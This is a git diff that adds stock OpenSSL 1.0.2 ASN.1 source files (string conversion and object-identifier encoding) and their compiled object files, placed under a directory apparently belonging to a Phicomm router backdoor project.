+ * (using the order Printable < IA5 < T61 < BMP < Universal < UTF8) and
+ * creates a string of the correct type with the supplied data. Yes this is
+ * horrible: it has to be :-( The 'ncopy' form checks minimum and maximum
+ * size limits too.
+ */
+
+int ASN1_mbstring_copy(ASN1_STRING **out, const unsigned char *in, int len,
+                       int inform, unsigned long mask)
+{
+    return ASN1_mbstring_ncopy(out, in, len, inform, mask, 0, 0);
+}
+
+int ASN1_mbstring_ncopy(ASN1_STRING **out, const unsigned char *in, int len,
+                        int inform, unsigned long mask,
+                        long minsize, long maxsize)
+{
+    int str_type;
+    int ret;
+    char free_out;
+    int outform, outlen = 0;
+    ASN1_STRING *dest;
+    unsigned char *p;
+    int nchar;
+    char strbuf[32];
+    int (*cpyfunc) (unsigned long, void *) = NULL;
+    if (len == -1)
+        len = strlen((const char *)in);
+    if (!mask)
+        mask = DIRSTRING_TYPE;
+
+    /* First do a string check and work out the number of characters */
+    switch (inform) {
+
+    case MBSTRING_BMP:
+        if (len & 1) {
+            ASN1err(ASN1_F_ASN1_MBSTRING_NCOPY,
+                    ASN1_R_INVALID_BMPSTRING_LENGTH);
+            return -1;
+        }
+        nchar = len >> 1;
+        break;
+
+    case MBSTRING_UNIV:
+        if (len & 3) {
+            ASN1err(ASN1_F_ASN1_MBSTRING_NCOPY,
+                    ASN1_R_INVALID_UNIVERSALSTRING_LENGTH);
+            return -1;
+        }
+        nchar = len >> 2;
+        break;
+
+    case MBSTRING_UTF8:
+        nchar = 0;
+        /* This counts the characters and does utf8 syntax checking */
+        ret = traverse_string(in, len, MBSTRING_UTF8, in_utf8, &nchar);
+        if (ret < 0) {
+            ASN1err(ASN1_F_ASN1_MBSTRING_NCOPY, ASN1_R_INVALID_UTF8STRING);
+            return -1;
+        }
+        break;
+
+    case MBSTRING_ASC:
+        nchar = len;
+        break;
+
+    default:
+        ASN1err(ASN1_F_ASN1_MBSTRING_NCOPY, ASN1_R_UNKNOWN_FORMAT);
+        return -1;
+    }
+
+    if ((minsize > 0) && (nchar < minsize)) {
+        ASN1err(ASN1_F_ASN1_MBSTRING_NCOPY, ASN1_R_STRING_TOO_SHORT);
+        BIO_snprintf(strbuf, sizeof strbuf, "%ld", minsize);
+        ERR_add_error_data(2, "minsize=", strbuf);
+        return -1;
+    }
+
+    if ((maxsize > 0) && (nchar > maxsize)) {
+        ASN1err(ASN1_F_ASN1_MBSTRING_NCOPY, ASN1_R_STRING_TOO_LONG);
+        BIO_snprintf(strbuf, sizeof strbuf, "%ld", maxsize);
+        ERR_add_error_data(2, "maxsize=", strbuf);
+        return -1;
+    }
+
+    /* Now work out minimal type (if any) */
+    if (traverse_string(in, len, inform, type_str, &mask) < 0) {
+        ASN1err(ASN1_F_ASN1_MBSTRING_NCOPY, ASN1_R_ILLEGAL_CHARACTERS);
+        return -1;
+    }
+
+    /* Now work out output format and string type */
+    outform = MBSTRING_ASC;
+    if (mask & B_ASN1_PRINTABLESTRING)
+        str_type = V_ASN1_PRINTABLESTRING;
+    else if (mask & B_ASN1_IA5STRING)
+        str_type = V_ASN1_IA5STRING;
+    else if (mask & B_ASN1_T61STRING)
+        str_type = V_ASN1_T61STRING;
+    else if (mask & B_ASN1_BMPSTRING) {
+        str_type = V_ASN1_BMPSTRING;
+        outform = MBSTRING_BMP;
+    } else if (mask & B_ASN1_UNIVERSALSTRING) {
+        str_type = V_ASN1_UNIVERSALSTRING;
+        outform = MBSTRING_UNIV;
+    } else {
+        str_type = V_ASN1_UTF8STRING;
+        outform = MBSTRING_UTF8;
+    }
+    if (!out)
+        return str_type;
+    if (*out) {
+        free_out = 0;
+        dest = *out;
+        if (dest->data) {
+            dest->length = 0;
+            OPENSSL_free(dest->data);
+            dest->data = NULL;
+        }
+        dest->type = str_type;
+    } else {
+        free_out = 1;
+        dest = ASN1_STRING_type_new(str_type);
+        if (!dest) {
+            ASN1err(ASN1_F_ASN1_MBSTRING_NCOPY, ERR_R_MALLOC_FAILURE);
+            return -1;
+        }
+        *out = dest;
+    }
+    /* If both the same type just copy across */
+    if (inform == outform) {
+        if (!ASN1_STRING_set(dest, in, len)) {
+            ASN1err(ASN1_F_ASN1_MBSTRING_NCOPY, ERR_R_MALLOC_FAILURE);
+            return -1;
+        }
+        return str_type;
+    }
+
+    /* Work out how much space the destination will need */
+    switch (outform) {
+    case MBSTRING_ASC:
+        outlen = nchar;
+        cpyfunc = cpy_asc;
+        break;
+
+    case MBSTRING_BMP:
+        outlen = nchar << 1;
+        cpyfunc = cpy_bmp;
+        break;
+
+    case MBSTRING_UNIV:
+        outlen = nchar << 2;
+        cpyfunc = cpy_univ;
+        break;
+
+    case MBSTRING_UTF8:
+        outlen = 0;
+        traverse_string(in, len, inform, out_utf8, &outlen);
+        cpyfunc = cpy_utf8;
+        break;
+    }
+    if (!(p = OPENSSL_malloc(outlen + 1))) {
+        if (free_out)
+            ASN1_STRING_free(dest);
+        ASN1err(ASN1_F_ASN1_MBSTRING_NCOPY, ERR_R_MALLOC_FAILURE);
+        return -1;
+    }
+    dest->length = outlen;
+    dest->data = p;
+    p[outlen] = 0;
+    traverse_string(in, len, inform, cpyfunc, &p);
+    return str_type;
+}
+
+/*
+ * This function traverses a string and passes the value of each character to
+ * an optional function along with a void * argument.
+ */
+
+static int traverse_string(const unsigned char *p, int len, int inform,
+                           int (*rfunc) (unsigned long value, void *in),
+                           void *arg)
+{
+    unsigned long value;
+    int ret;
+    while (len) {
+        if (inform == MBSTRING_ASC) {
+            value = *p++;
+            len--;
+        } else if (inform == MBSTRING_BMP) {
+            value = *p++ << 8;
+            value |= *p++;
+            len -= 2;
+        } else if (inform == MBSTRING_UNIV) {
+            value = ((unsigned long)*p++) << 24;
+            value |= ((unsigned long)*p++) << 16;
+            value |= *p++ << 8;
+            value |= *p++;
+            len -= 4;
+        } else {
+            ret = UTF8_getc(p, len, &value);
+            if (ret < 0)
+                return -1;
+            len -= ret;
+            p += ret;
+        }
+        if (rfunc) {
+            ret = rfunc(value, arg);
+            if (ret <= 0)
+                return ret;
+        }
+    }
+    return 1;
+}
+
+/* Various utility functions for traverse_string */
+
+/* Just count number of characters */
+
+static int in_utf8(unsigned long value, void *arg)
+{
+    int *nchar;
+    nchar = arg;
+    (*nchar)++;
+    return 1;
+}
+
+/* Determine size of output as a UTF8 String */
+
+static int out_utf8(unsigned long value, void *arg)
+{
+    int *outlen;
+    outlen = arg;
+    *outlen += UTF8_putc(NULL, -1, value);
+    return 1;
+}
+
+/*
+ * Determine the "type" of a string: check each character against a supplied
+ * "mask".
+ */
+
+static int type_str(unsigned long value, void *arg)
+{
+    unsigned long types;
+    types = *((unsigned long *)arg);
+    if ((types & B_ASN1_PRINTABLESTRING) && !is_printable(value))
+        types &= ~B_ASN1_PRINTABLESTRING;
+    if ((types & B_ASN1_IA5STRING) && (value > 127))
+        types &= ~B_ASN1_IA5STRING;
+    if ((types & B_ASN1_T61STRING) && (value > 0xff))
+        types &= ~B_ASN1_T61STRING;
+    if ((types & B_ASN1_BMPSTRING) && (value > 0xffff))
+        types &= ~B_ASN1_BMPSTRING;
+    if (!types)
+        return -1;
+    *((unsigned long *)arg) = types;
+    return 1;
+}
+
+/* Copy one byte per character ASCII like strings */
+
+static int cpy_asc(unsigned long value, void *arg)
+{
+    unsigned char **p, *q;
+    p = arg;
+    q = *p;
+    *q = (unsigned char)value;
+    (*p)++;
+    return 1;
+}
+
+/* Copy two byte per character BMPStrings */
+
+static int cpy_bmp(unsigned long value, void *arg)
+{
+    unsigned char **p, *q;
+    p = arg;
+    q = *p;
+    *q++ = (unsigned char)((value >> 8) & 0xff);
+    *q = (unsigned char)(value & 0xff);
+    *p += 2;
+    return 1;
+}
+
+/* Copy four byte per character UniversalStrings */
+
+static int cpy_univ(unsigned long value, void *arg)
+{
+    unsigned char **p, *q;
+    p = arg;
+    q = *p;
+    *q++ = (unsigned char)((value >> 24) & 0xff);
+    *q++ = (unsigned char)((value >> 16) & 0xff);
+    *q++ = (unsigned char)((value >> 8) & 0xff);
+    *q = (unsigned char)(value & 0xff);
+    *p += 4;
+    return 1;
+}
+
+/* Copy to a UTF8String */
+
+static int cpy_utf8(unsigned long value, void *arg)
+{
+    unsigned char **p;
+    int ret;
+    p = arg;
+    /* We already know there is enough room so pass 0xff as the length */
+    ret = UTF8_putc(*p, 0xff, value);
+    *p += ret;
+    return 1;
+}
+
+/* Return 1 if the character is permitted in a PrintableString */
+static int is_printable(unsigned long value)
+{
+    int ch;
+    if (value > 0x7f)
+        return 0;
+    ch = (int)value;
+    /*
+     * Note: we can't use 'isalnum' because certain accented characters may
+     * count as alphanumeric in some environments.
+     */
+#ifndef CHARSET_EBCDIC
+    if ((ch >= 'a') && (ch <= 'z'))
+        return 1;
+    if ((ch >= 'A') && (ch <= 'Z'))
+        return 1;
+    if ((ch >= '0') && (ch <= '9'))
+        return 1;
+    if ((ch == ' ') || strchr("'()+,-./:=?", ch))
+        return 1;
+#else                           /* CHARSET_EBCDIC */
+    if ((ch >= os_toascii['a']) && (ch <= os_toascii['z']))
+        return 1;
+    if ((ch >= os_toascii['A']) && (ch <= os_toascii['Z']))
+        return 1;
+    if ((ch >= os_toascii['0']) && (ch <= os_toascii['9']))
+        return 1;
+    if ((ch == os_toascii[' ']) || strchr("'()+,-./:=?", os_toebcdic[ch]))
+        return 1;
+#endif                          /* CHARSET_EBCDIC */
+    return 0;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_mbstr.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_mbstr.o
new file mode 100644
index 0000000000000000000000000000000000000000..507ee8cf7de794b2aa84860f49311a27b28c5680
GIT binary patch
literal 5248
zcmbtXeQZ<L6~F!<geE*^6ozS2=7F<@0bWd)2wmy&5<9t(%!fi!s7mV@#~~SslRD37
z!dgQ1YSb$en*Y{m{IN;<Ba@~{>!huU5H&LpsM^w2^pB~UNLw_LdK3yBWZ~oOocr!g
zUQ8lQ+mZb4IluF9?>YCrbDsx-p*p+GMkLwDGh|khD2(5l<*PYcO%$?}+;Xj+HVWQG
zmn`x$T~Pgc6_=?|AfeXNV}-3uz<PmQ;;xIcpp%2UDZ544^eF=Z()5oea4PyHwK;gm
z=cUawnE4I;1A`mP(W*@i?3-rF?(e4Q)wi>Dt%~Z#z{@^1rH^0MCsciERd3l){fGM0
zlHMmk<<VBM2Xtr~&SXxP$|Rjs|Kk4bY>D;=)$b4VqImsw)~PL}gZFW19J%Wn{i3L+
z7$LxVi;i5qqn|fu>Qik=11t5KD}F)UmsR(u&u(Yu)aC~EzS^X+OU>+Gkmy~i|I^(<
z)6TMT%#sDXh5k$fyPCSD9aabL*-8jWDy}~}jQ6RLrOfHgH3Do$ctva4p<lC8J!?NY
z?)poHYd3?|iP}d|32V+eUFVspbBEY8`--y5JjGO|Z|%CXSl8@!nC&=CKkW^%+p6(N
zDl>2-_XuBl&VkvaL*Bv`T3O83s4X%pq@Qs=4~eNSs4uEvz9;IQ26jh%R%IWk%_{pu
zZQ9P>YZf`~4Pk0D{d?~)<T)o{>d%Y?yl#MrK5ZmRsD8nq?9R<U&^sRmhT09Pzv3+<
z$t4u53Jai2>fi$`fL1Z!0hS<}00wL2O8pYT1Xzc+bn;ig0gTnqR!<J1bo;DLD-QZI
z{tKfh=T-*T#79#(A1EB!8dH%1#i>K^cxNd*c&@7co-tYIz`zryr|ghPX|6gn1j8uK
z9$;UEm_dh@-nwTPu*g#IBNIgr3?r54cbid<0+bsu`ClV{VteY!;q5dE=Ao_QuhyEX
zH$gQ!d1$D^Th3Q-$^(iJ`z*w+)1ei>6Mu#)LhMUA^g{%4yJ+g#;e9+J-8yl&(Tw;D
zP+23kSR+z48DdxSBYrL-zGI)AXL1VC!ITRF?B-0u!;tXA8aVopsLP!174Vrn3C1)H
z#v}G*<w!~L=@Dl#=o%d_N`%U=wNQP^w(4X3^LvAT#qB{cxax|kU%8>`XG(LMMsY9I
zlaFFrWkUEi3T`1RN1<pGkAZq}H3;y=xn7H5==6H1gSMWgUoE65Lwjs22x>yuaxX6!
z9SatsoL=q?u$a^TY3}<0c2#Ntr73t@&L%}VDws}QgA6Hi{K*#BdNb(`urEW<E!cG)
zFO_knu7OeR;@~ttmHvTcgVX#_?iifLJTxU&I5^FZVY&Z8E&_Eag~Rgkv|+$Wa_4pl
z;1U3~42QM}=x+d>9>)Xc&aDF<`(4ABsXy+9TfR9HCqM-jC&2@p-J>^PO=2G@EA|fc
z+069Q#b$;9uP3?UH7MG01Cuk8nOuxQw8`tHEC@S|=NhN+ux4@&GJv@!Dsdv1f<i}d
z=5>U<0XCl36rjJA1pOC&D*CE^#+`k#eBJsD8+|``YTJ)VSw{=$Y>)S}ABt@wosmA1
ziG(}%_h<=Ul#u$`+NV6_&HIyaE$P|ntMpZD^lwRW(SLYTg|A}sIuj<u2`NLp$s+jG
z?`S4)d^3o_i^~ZQ4U+9pBeC_B*d8xlTsRCz27UND3u7@F03lYvIYRIlA|V#w93i}2
z32d*x_<IRF>N*7G#WARq==K*CJa?#j9Wfw0x2A3{*Oi0#Tf~6ywIy{*$uWCCaUXRA
z6p!w-rxdrUl+>UxuH!?r0lJKj8l~h7dyV2g?g%QLA!kr2Kei~KR2(g+RjTyG^~x^$
z+e($HRH#aMjp6}AaDYe@T-{Iuq!mthz?^T`gY(2u%{aq0$3GlO6@<=<WY(}n#9D~~
zsp5vkH1On5UVzZWNxsHA^&xW1|0M!@DtC3Ri-VtnxmXd1c1s+&$GESETV?coT;Sh9
z0Z8ukTHw)s3rC?|V%#9`kdXPF1CMPP?Yjle_gnA|eoBQPhG$?z`{P39X8`zmftQKe
z^8FSz4zgHqa|Z{3LoyFJ$dZT9JsiQeW-jgH;-Z=QNNq&m_&!*vl?#i=Dk}*5L4mKy
z!%=jQf`?G7SAJ|X!aH<6e0TvI>o=eMZx+Dc0(=?N---7g5Pu(FJO{t|;#^t)|7-#L
zn+0%~a^CnW7Qpcw%(tG(1@HjinAa*%>Xon#PP1*cJswVKtyLu2-5-whMESVCvzw2}
zczdtOphZ_wGflPr?pPR_G<<wTdSi(mF0{uF5MQXa0v~>SY{Ew+J~oqZeQ0Nm8Vc{M
ztJ@uH3OA`Wp<tLaH`P^zyOUa!K(J_A!UPV)00=|;Nc3Ph+IBG98fot!>h2wW^J;*J
z!trQVcRvX>HllktmPm9ZNKM1ea8JBD(H_@Yxhm4qVyeO|5iLS$8=u?Nv@_hAh{eok
zyPFytcGQP?Hu2cYbHJXMCLKB>9UWcKIojD6{IbFo@dc5ei1K1P#ohrQNt^~3z~2=(
z9y|PtCG9U-?D3tF_*<}_NErVy_(}Y03ywWZ;(r(C8SS62;9=21^YNDij&92=_I(z6
z>}4|k&n@=YQziaKi@kN;ti|3M|6Pl{HU1@wJ>KCm{<y^+d$q)WhY11U;DMjS$1M1F
zE%?7J_!<j-LbODz1NM3uXGGxWw$_55v*2C}?hx-C+FSSKNehnOA2PlNcqE(`f08x}
zM&k0`!aE#E;_}`y`}Zuq#Wb6_kEFf4w~h(D#Jhz&l84Lt3Hu+Cw3qi&sW^ucm;JOY
z510Lj_<H&~wa9)LwS+mgNiGrVi1@TvpGJKA{q^nd=^?&E7Yb<Z_d%P9c6D~f;$RZ*
z(qcaN^xMe$hL8`$lfLdmS9dI-^@A%0jI}`rh;+ux_5Z(54+Ox}#CFbvs}@{Eo<fvi
z#tzQ}o{j1m#AJ5iA5frbEF=(q$Dpsg+2wc1_XI9p2arta&YM@_`SWi81;+ee{r%vJ
zF*m`_N^*XTZzVau9IHWze1+8r_!DCN>+^8wC&vcROWtZa_Fv}z95~@ulqmB|i1WhV
zGlQ6ntiOa`0tV;L_n#2{NAebz@81Ew^X>nz%bekcIq?0*uQ%y0_kX^*(WOlo4vUQ~
q1`O~1e1D9YzxM!<DLimMd-B$wC-OUMKK~=)Bjsmin3-q3|9=2lQZb(Z

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_object.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_object.c
new file mode 100644
index 0000000..27f9c16
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_object.c
@@ -0,0 +1,402 @@
+/* crypto/asn1/a_object.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <limits.h>
+#include "cryptlib.h"
+#include <openssl/buffer.h>
+#include <openssl/asn1.h>
+#include <openssl/objects.h>
+#include <openssl/bn.h>
+
+int i2d_ASN1_OBJECT(ASN1_OBJECT *a, unsigned char **pp)
+{
+    unsigned char *p;
+    int objsize;
+
+    if ((a == NULL) || (a->data == NULL))
+        return (0);
+
+    objsize = ASN1_object_size(0, a->length, V_ASN1_OBJECT);
+    if (pp == NULL)
+        return objsize;
+
+    p = *pp;
+    ASN1_put_object(&p, 0, a->length, V_ASN1_OBJECT, V_ASN1_UNIVERSAL);
+    memcpy(p, a->data, a->length);
+    p += a->length;
+
+    *pp = p;
+    return (objsize);
+}
+
+int a2d_ASN1_OBJECT(unsigned char *out, int olen, const char *buf, int num)
+{
+    int i, first, len = 0, c, use_bn;
+    char ftmp[24], *tmp = ftmp;
+    int tmpsize = sizeof ftmp;
+    const char *p;
+    unsigned long l;
+    BIGNUM *bl = NULL;
+
+    if (num == 0)
+        return (0);
+    else if (num == -1)
+        num = strlen(buf);
+
+    p = buf;
+    c = *(p++);
+    num--;
+    if ((c >= '0') && (c <= '2')) {
+        first = c - '0';
+    } else {
+        ASN1err(ASN1_F_A2D_ASN1_OBJECT, ASN1_R_FIRST_NUM_TOO_LARGE);
+        goto err;
+    }
+
+    if (num <= 0) {
+        ASN1err(ASN1_F_A2D_ASN1_OBJECT, ASN1_R_MISSING_SECOND_NUMBER);
+        goto err;
+    }
+    c = *(p++);
+    num--;
+    for (;;) {
+        if (num <= 0)
+            break;
+        if ((c != '.') && (c != ' ')) {
+            ASN1err(ASN1_F_A2D_ASN1_OBJECT, ASN1_R_INVALID_SEPARATOR);
+            goto err;
+        }
+        l = 0;
+        use_bn = 0;
+        for (;;) {
+            if (num <= 0)
+                break;
+            num--;
+            c = *(p++);
+            if ((c == ' ') || (c == '.'))
+                break;
+            if ((c < '0') || (c > '9')) {
+                ASN1err(ASN1_F_A2D_ASN1_OBJECT, ASN1_R_INVALID_DIGIT);
+                goto err;
+            }
+            if (!use_bn && l >= ((ULONG_MAX - 80) / 10L)) {
+                use_bn = 1;
+                if (!bl)
+                    bl = BN_new();
+                if (!bl || !BN_set_word(bl, l))
+                    goto err;
+            }
+            if (use_bn) {
+                if (!BN_mul_word(bl, 10L)
+                    || !BN_add_word(bl, c - '0'))
+                    goto err;
+            } else
+                l = l * 10L + (long)(c - '0');
+        }
+        if (len == 0) {
+            if ((first < 2) && (l >= 40)) {
+                ASN1err(ASN1_F_A2D_ASN1_OBJECT,
+                        ASN1_R_SECOND_NUMBER_TOO_LARGE);
+                goto err;
+            }
+            if (use_bn) {
+                if (!BN_add_word(bl, first * 40))
+                    goto err;
+            } else
+                l += (long)first *40;
+        }
+        i = 0;
+        if (use_bn) {
+            int blsize;
+            blsize = BN_num_bits(bl);
+            blsize = (blsize + 6) / 7;
+            if (blsize > tmpsize) {
+                if (tmp != ftmp)
+                    OPENSSL_free(tmp);
+                tmpsize = blsize + 32;
+                tmp = OPENSSL_malloc(tmpsize);
+                if (!tmp)
+                    goto err;
+            }
+            while (blsize--)
+                tmp[i++] = (unsigned char)BN_div_word(bl, 0x80L);
+        } else {
+
+            for (;;) {
+                tmp[i++] = (unsigned char)l & 0x7f;
+                l >>= 7L;
+                if (l == 0L)
+                    break;
+            }
+
+        }
+        if (out != NULL) {
+            if (len + i > olen) {
+                ASN1err(ASN1_F_A2D_ASN1_OBJECT, ASN1_R_BUFFER_TOO_SMALL);
+                goto err;
+            }
+            while (--i > 0)
+                out[len++] = tmp[i] | 0x80;
+            out[len++] = tmp[0];
+        } else
+            len += i;
+    }
+    if (tmp != ftmp)
+        OPENSSL_free(tmp);
+    if (bl)
+        BN_free(bl);
+    return (len);
+ err:
+    if (tmp != ftmp)
+        OPENSSL_free(tmp);
+    if (bl)
+        BN_free(bl);
+    return (0);
+}
+
+int i2t_ASN1_OBJECT(char *buf, int buf_len, ASN1_OBJECT *a)
+{
+    return OBJ_obj2txt(buf, buf_len, a, 0);
+}
+
+int i2a_ASN1_OBJECT(BIO *bp, ASN1_OBJECT *a)
+{
+    char buf[80], *p = buf;
+    int i;
+
+    if ((a == NULL) || (a->data == NULL))
+        return (BIO_write(bp, "NULL", 4));
+    i = i2t_ASN1_OBJECT(buf, sizeof buf, a);
+    if (i > (int)(sizeof(buf) - 1)) {
+        p = OPENSSL_malloc(i + 1);
+        if (!p)
+            return -1;
+        i2t_ASN1_OBJECT(p, i + 1, a);
+    }
+    if (i <= 0)
+        return BIO_write(bp, "<INVALID>", 9);
+    BIO_write(bp, p, i);
+    if (p != buf)
+        OPENSSL_free(p);
+    return (i);
+}
+
+ASN1_OBJECT *d2i_ASN1_OBJECT(ASN1_OBJECT **a, const unsigned char **pp,
+                             long length)
+{
+    const unsigned char *p;
+    long len;
+    int tag, xclass;
+    int inf, i;
+    ASN1_OBJECT *ret = NULL;
+    p = *pp;
+    inf = ASN1_get_object(&p, &len, &tag, &xclass, length);
+    if (inf & 0x80) {
+        i = ASN1_R_BAD_OBJECT_HEADER;
+        goto err;
+    }
+
+    if (tag != V_ASN1_OBJECT) {
+        i = ASN1_R_EXPECTING_AN_OBJECT;
+        goto err;
+    }
+    ret = c2i_ASN1_OBJECT(a, &p, len);
+    if (ret)
+        *pp = p;
+    return ret;
+ err:
+    ASN1err(ASN1_F_D2I_ASN1_OBJECT, i);
+    return (NULL);
+}
+
+ASN1_OBJECT *c2i_ASN1_OBJECT(ASN1_OBJECT **a, const unsigned char **pp,
+                             long len)
+{
+    ASN1_OBJECT *ret = NULL;
+    const unsigned char *p;
+    unsigned char *data;
+    int i, length;
+
+    /*
+     * Sanity check OID encoding. Need at least one content octet. MSB must
+     * be clear in the last octet. can't have leading 0x80 in subidentifiers,
+     * see: X.690 8.19.2
+     */
+    if (len <= 0 || len > INT_MAX || pp == NULL || (p = *pp) == NULL ||
+        p[len - 1] & 0x80) {
+        ASN1err(ASN1_F_C2I_ASN1_OBJECT, ASN1_R_INVALID_OBJECT_ENCODING);
+        return NULL;
+    }
+    /* Now 0 < len <= INT_MAX, so the cast is safe. */
+    length = (int)len;
+    for (i = 0; i < length; i++, p++) {
+        if (*p == 0x80 && (!i || !(p[-1] & 0x80))) {
+            ASN1err(ASN1_F_C2I_ASN1_OBJECT, ASN1_R_INVALID_OBJECT_ENCODING);
+            return NULL;
+        }
+    }
+
+    /*
+     * only the ASN1_OBJECTs from the 'table' will have values for ->sn or
+     * ->ln
+     */
+    if ((a == NULL) || ((*a) == NULL) ||
+        !((*a)->flags & ASN1_OBJECT_FLAG_DYNAMIC)) {
+        if ((ret = ASN1_OBJECT_new()) == NULL)
+            return (NULL);
+    } else
+        ret = (*a);
+
+    p = *pp;
+    /* detach data from object */
+    data = (unsigned char *)ret->data;
+    ret->data = NULL;
+    /* once detached we can change it */
+    if ((data == NULL) || (ret->length < length)) {
+        ret->length = 0;
+        if (data != NULL)
+            OPENSSL_free(data);
+        data = (unsigned char *)OPENSSL_malloc(length);
+        if (data == NULL) {
+            i = ERR_R_MALLOC_FAILURE;
+            goto err;
+        }
+        ret->flags |= ASN1_OBJECT_FLAG_DYNAMIC_DATA;
+    }
+    memcpy(data, p, length);
+    /* reattach data to object, after which it remains const */
+    ret->data = data;
+    ret->length = length;
+    ret->sn = NULL;
+    ret->ln = NULL;
+    /* ret->flags=ASN1_OBJECT_FLAG_DYNAMIC; we know it is dynamic */
+    p += length;
+
+    if (a != NULL)
+        (*a) = ret;
+    *pp = p;
+    return (ret);
+ err:
+    ASN1err(ASN1_F_C2I_ASN1_OBJECT, i);
+    if ((ret != NULL) && ((a == NULL) || (*a != ret)))
+        ASN1_OBJECT_free(ret);
+    return (NULL);
+}
+
+ASN1_OBJECT *ASN1_OBJECT_new(void)
+{
+    ASN1_OBJECT *ret;
+
+    ret = (ASN1_OBJECT *)OPENSSL_malloc(sizeof(ASN1_OBJECT));
+    if (ret == NULL) {
+        ASN1err(ASN1_F_ASN1_OBJECT_NEW, ERR_R_MALLOC_FAILURE);
+        return (NULL);
+    }
+    ret->length = 0;
+    ret->data = NULL;
+    ret->nid = 0;
+    ret->sn = NULL;
+    ret->ln = NULL;
+    ret->flags = ASN1_OBJECT_FLAG_DYNAMIC;
+    return (ret);
+}
+
+void ASN1_OBJECT_free(ASN1_OBJECT *a)
+{
+    if (a == NULL)
+        return;
+    if (a->flags & ASN1_OBJECT_FLAG_DYNAMIC_STRINGS) {
+#ifndef CONST_STRICT            /* disable purely for compile-time strict
+                                 * const checking. Doing this on a "real"
+                                 * compile will cause memory leaks */
+        if (a->sn != NULL)
+            OPENSSL_free((void *)a->sn);
+        if (a->ln != NULL)
+            OPENSSL_free((void *)a->ln);
+#endif
+        a->sn = a->ln = NULL;
+    }
+    if (a->flags & ASN1_OBJECT_FLAG_DYNAMIC_DATA) {
+        if (a->data != NULL)
+            OPENSSL_free((void *)a->data);
+        a->data = NULL;
+        a->length = 0;
+    }
+    if (a->flags & ASN1_OBJECT_FLAG_DYNAMIC)
+        OPENSSL_free(a);
+}
+
+ASN1_OBJECT *ASN1_OBJECT_create(int nid, unsigned char *data, int len,
+                                const char *sn, const char *ln)
+{
+    ASN1_OBJECT o;
+
+    o.sn = sn;
+    o.ln = ln;
+    o.data = data;
+    o.nid = nid;
+    o.length = len;
+    o.flags = ASN1_OBJECT_FLAG_DYNAMIC | ASN1_OBJECT_FLAG_DYNAMIC_STRINGS |
+        ASN1_OBJECT_FLAG_DYNAMIC_DATA;
+    return (OBJ_dup(&o));
+}
+
+IMPLEMENT_STACK_OF(ASN1_OBJECT)
+
+IMPLEMENT_ASN1_SET_OF(ASN1_OBJECT)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_object.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_object.o
new file mode 100644
index 0000000000000000000000000000000000000000..ba68a68b89d2b7626d6ce75eae69c8460c7d22d9
GIT binary patch
literal 6664
zcmbtZZ){uD6~DHV)GguJr71I%q6c#!qhRa+BZ1KQId*f+oCeyo6ln2W+tARYDb91t
zpR|c^T=ikRF>M+}nzVjEV$xt@(msrA3T7z{9g|i%q@r~&)*?!0{s^juwm`je?z=a+
zezp0qUFp4h@9&;-?z!ijd(Lw*8i}p6+iXNM8(Bf-W&$N-&!uzYAR7jWLM|q!Tvwjc
